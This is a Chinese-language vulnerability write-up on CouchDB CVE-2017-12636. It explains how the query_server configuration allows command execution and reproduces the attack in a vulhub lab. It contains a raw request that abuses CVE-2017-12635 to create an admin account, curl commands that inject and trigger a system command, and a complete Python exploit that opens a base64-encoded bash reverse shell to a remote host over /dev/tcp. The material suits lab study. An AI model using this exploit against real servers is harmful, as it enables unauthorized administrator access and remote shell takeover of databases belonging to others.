couchdb 任意命令执行漏洞 cve-2017-12636

1. Couchdb简介：

Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，Credit Suisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。

1. 漏洞简介：

CouchDB 是一个开源的面向文档的数据库管理系统，可以通过 RESTful JavaScript Object Notation (JSON) API 访问。CouchDB会默认会在5984端口开放Restful的API接口，用于数据库的管理功能。

那么，问题出在哪呢？翻阅官方描述会发现，CouchDB中有一个Query_Server的配置项，在官方文档中是这么描述的：

CouchDB delegates computation of design documents functions to external query servers. The external query server is a special OS process which communicates with CouchDB over standard input/output using a very simple line-based protocol with JSON messages.

直白点说，就是CouchDB允许用户指定一个二进制程序或者脚本，与CouchDB进行数据交互和处理，query_server在配置文件local.ini中的格式：

[query_servers]
LANGUAGE = PATH ARGS

默认情况下，配置文件中已经设置了两个query_servers:

[query_servers]
javascript = /usr/bin/couchjs /usr/share/couchdb/server/main.js
coffeescript = /usr/bin/couchjs /usr/share/couchdb/server/main-coffee.js

可以看到，CouchDB在query_server中引入了外部的二进制程序来执行命令，如果我们可以更改这个配置，那么就可以利用数据库来执行命令了，但是这个配置是在local.ini文件中的，如何控制呢？

继续读官方的文档，发现了一个有意思的功能，CouchDB提供了一个API接口用来更改自身的配置，并把修改后的结果保存到配置文件中：

The CouchDB Server Configuration API provide an interface to query and update the various configuration values within a running CouchDB instance

也就是说，除了local.ini的配置文件，CouchDB允许通过自身提供的Restful API接口动态修改配置属性。结合以上两点，我们可以在一个未授权访问的CouchDB上，通过修改其query_server配置，来执行系统命令。

原文：https://blog.csdn.net/jiangbuliu/article/details/94029940
https://www.secpulse.com/archives/45917.html

1. 漏洞影响范围：

Apache CouchDB小于 1.7.0 以及 小于 2.1.1

1. 漏洞复现

[1] 使用vulhub搭建漏洞环境

 cd /root/vulhub/couchdb/CVE-2017-12636                进入本次复现的vulhub目录
 docker-compose up -d                                  docker-compose搭建环境

 

[2]启动完成后，访问http://your-ip:5984/即可看到Couchdb的欢迎页面。
[3]该漏洞是需要登录用户才可以触发，如果不知道目标管理员密码，可以利用CVE-2017-12635先增加一个管理员用户。使用burp或者curl命令发送如下请求包：

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 172.20.10.4:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

创建用户名为：vulhub；密码为：vulhub的用户。
[4]漏洞利用代码

> 1、新增query_server配置，写入要执行的命令：
curl -X PUT 'http://username:password@your-ip:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
> 2、新建一个临时库和临时表，插入一条记录：
curl -X PUT 'http://username:password@your-ip:5984/vultest'
curl -X PUT 'http://username:password@your-ip:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
> 3、调用query_server处理数据 
curl -X POST 'http://username:password@your-ip:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

 

第一个请求是添加一个名字为cmd的query_servers，其值为"id >/tmp/success"，这就是我们后面待执行的命令。

第二、三个请求是添加一个Database和Document，这里添加了后面才能查询。
第四个请求就是在这个Database里进行查询，因为我将language设置为cmd，这里就会用到我第一步里添加的名为cmd的query_servers，最后触发命令执行。

exp（注意更改target、command、version）：

#!/usr/bin/env python3
import requests
import json
import base64
from requests.auth import HTTPBasicAuth

target = 'http://192.168.11.140:5984'
command = rb"""bash -i >& /dev/tcp/192.168.11.1/8888 0>&1"""
version = 1

session = requests.session()
session.headers = {
    'Content-Type': 'application/json'
}
 #session.proxies = {
 #      'http': 'http://127.0.0.1:8085'
 # }
 
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
  "type": "user",
  "name": "wooyun",
  "roles": ["_admin"],
  "roles": [],
  "password": "wooyun"
}''')

session.auth = HTTPBasicAuth('wooyun', 'wooyun')

command = "bash -c '{echo,%s}|{base64,-d}|{bash,-i}'" % base64.b64encode(command).decode()
if version == 1:
    session.put(target + ('/_config/query_servers/cmd'), data=json.dumps(command))
else:
    host = session.get(target + '/_membership').json()['all_nodes'][0]
    session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=json.dumps(command))

session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')

if version == 1:
    session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
    session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')